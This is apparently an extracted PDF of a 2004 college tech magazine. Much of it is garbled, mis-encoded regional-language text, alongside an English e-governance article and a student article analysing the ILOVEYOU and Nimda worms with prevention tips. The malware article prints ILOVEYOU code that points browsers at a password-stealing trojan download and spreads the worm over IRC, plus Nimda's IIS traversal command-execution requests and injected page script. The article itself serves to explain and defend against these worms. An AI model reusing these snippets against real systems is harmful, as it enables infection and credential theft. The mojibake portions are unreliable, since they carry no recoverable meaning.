LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 40: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL 